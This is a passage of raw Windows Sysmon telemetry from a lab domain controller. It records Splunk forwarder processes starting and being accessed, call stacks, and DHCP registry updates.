Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.713{59A5CD1D-9544-6005-5B05-00000000A301}6400C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.198{59A5CD1D-9544-6005-5A05-00000000A301}38047080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.041{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:48.042{59A5CD1D-9544-6005-5A05-00000000A301}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:49.557{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:49.557{59A5CD1D-9545-6005-5C05-00000000A301}5028C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:57.134{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000018689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:58.853{59A5CD1D-8E46-6005-1600-00000000A301}15444444C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:03:58.853{59A5CD1D-8E46-6005-1600-00000000A301}15444444C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2F00-00000000A301}2276C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000018687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x800000000000000018686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000018685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x800000000000000018684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x6005a35e) 13241300x800000000000000018683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x6005a19c) 13241300x800000000000000018682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x60059c56) 13241300x800000000000000018681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x6005954e) 13241300x800000000000000018680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x800000000000000018679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x800000000000000018678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x800000000000000018677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x800000000000000018676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 14:03:58.853{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 10341000x800000000000000018691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:59.634{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+a4660|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF80184AEE8D8)|UNKNOWN(FFFFD3D9952B4998)|UNKNOWN(FFFFD3D9952B4B17)|UNKNOWN(FFFFD3D9952AF1A1)|UNKNOWN(FFFFD3D9952B0B6A)|UNKNOWN(FFFFD3D9952AEE26)|UNKNOWN(FFFFF80184805E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a7ecb|C:\Windows\System32\SHELL32.dll+6988a|C:\Windows\System32\SHCORE.dll+33fad 10341000x800000000000000018690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:59.634{59A5CD1D-93FA-6005-FC04-00000000A301}37841192C:\Windows\Explorer.EXE{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 